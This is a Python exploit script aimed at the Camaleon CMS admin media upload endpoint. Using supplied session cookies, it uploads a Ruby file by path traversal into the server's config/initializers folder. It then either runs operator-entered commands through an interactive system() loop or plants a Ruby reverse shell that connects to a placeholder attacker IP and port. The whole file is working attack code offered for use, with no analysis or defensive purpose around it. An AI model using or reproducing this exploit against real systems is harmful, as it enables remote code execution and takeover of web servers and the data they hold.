exploit_camaleon.py

import requests

def exploit_camaleon(auth_token, session_token, target_url, payload_type):
    # Define the headers
    headers = {
        'User-Agent': 'Mozilla/5.0',
        'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundary80dMC9jX3srWAsga',
        'Accept': '*/*',
        'Connection': 'keep-alive',
    }
    
    # Define the cookies (auth_token and session token)
    cookies = {
        'auth_token': auth_token,
        '_cms_session': session_token,
    }

    # Repeated command execution functionality
    if payload_type == "command_execution":
        while True:
            # Prompt the user for a command to execute
            command = input("Enter a system command to execute (or type 'exit' to quit): ")
            if command.lower() == "exit":
                print("Exiting command execution mode.")
                break

            # Command execution payload
            payload = (
                'puts "==============================="\r\n'
                'puts "= EXECUTING SYSTEM COMMANDS ="\r\n'
                'puts "==============================="\r\n'
                f'system("{command}")\r\n'  # Execute the entered command
                'puts "==============================="\r\n'
            )
            file_name = 'command_exec.rb'

            # Multipart form data with the chosen payload
            data = (
                f'------WebKitFormBoundary80dMC9jX3srWAsga\r\n'
                f'Content-Disposition: form-data; name="file_upload"; filename="{file_name}"\r\n'
                f'Content-Type: text/x-ruby-script\r\n\r\n'
                f'{payload}\r\n'
                f'------WebKitFormBoundary80dMC9jX3srWAsga\r\n'
                f'Content-Disposition: form-data; name="folder"\r\n\r\n'
                f'../../../config/initializers/\r\n'
                f'------WebKitFormBoundary80dMC9jX3srWAsga\r\n'
                f'Content-Disposition: form-data; name="skip_auto_crop"\r\n\r\n'
                f'true\r\n'
                f'------WebKitFormBoundary80dMC9jX3srWAsga--\r\n'
            )

            # Send the POST request
            response = requests.post(
                f"{target_url}/admin/media/upload?actions=false",
                headers=headers,
                cookies=cookies,
                data=data,
                verify=False  # Disable SSL verification (adjust as needed)
            )

            # Check if the exploit was successful
            if response.status_code == 200:
                print(f"Command '{command}' executed successfully!")
                print("Response: ", response.text)  # Print response content to debug
            else:
                print(f"Failed to execute '{command}' with status code: {response.status_code}")
                print("Response: ", response.text)  # Print the response content for debugging

    elif payload_type == "reverse_shell":
        # Ruby reverse shell payload
        payload = (
            'require \'socket\'\r\n'
            's = TCPSocket.open(\'your_ip\', your_port)\r\n'
            'while (cmd = s.gets)\r\n'
            '  IO.popen(cmd, \'r\') do |io|\r\n'
            '    s.print io.read\r\n'
            '  end\r\n'
            'end\r\n'
        )
        file_name = 'reverse_shell.rb'

        # Multipart form data with the reverse shell payload
        data = (
            f'------WebKitFormBoundary80dMC9jX3srWAsga\r\n'
            f'Content-Disposition: form-data; name="file_upload"; filename="{file_name}"\r\n'
            f'Content-Type: text/x-ruby-script\r\n\r\n'
            f'{payload}\r\n'
            f'------WebKitFormBoundary80dMC9jX3srWAsga\r\n'
            f'Content-Disposition: form-data; name="folder"\r\n\r\n'
            f'../../../config/initializers/\r\n'
            f'------WebKitFormBoundary80dMC9jX3srWAsga\r\n'
            f'Content-Disposition: form-data; name="skip_auto_crop"\r\n\r\n'
            f'true\r\n'
            f'------WebKitFormBoundary80dMC9jX3srWAsga--\r\n'
        )

        # Send the POST request for reverse shell
        response = requests.post(
            f"{target_url}/admin/media/upload?actions=false",
            headers=headers,
            cookies=cookies,
            data=data,
            verify=False  # Disable SSL verification (adjust as needed)
        )

        # Check if the exploit was successful
        if response.status_code == 200:
            print(f"Exploit executed successfully with reverse shell!")
        else:
            print(f"Failed with status code: {response.status_code}")
            print("Response: ", response.text)

if __name__ == "__main__":
    # Replace these with actual tokens and target URL
    auth_token = "your_auth_token_here"
    session_token = "your_session_token_here"
    target_url = "https://target_site_here"

    # Choose the type of payload: "reverse_shell" or "command_execution"
    payload_type = input("Enter payload type ('reverse_shell' or 'command_execution'): ").strip()

    exploit_camaleon(auth_token, session_token, target_url, payload_type)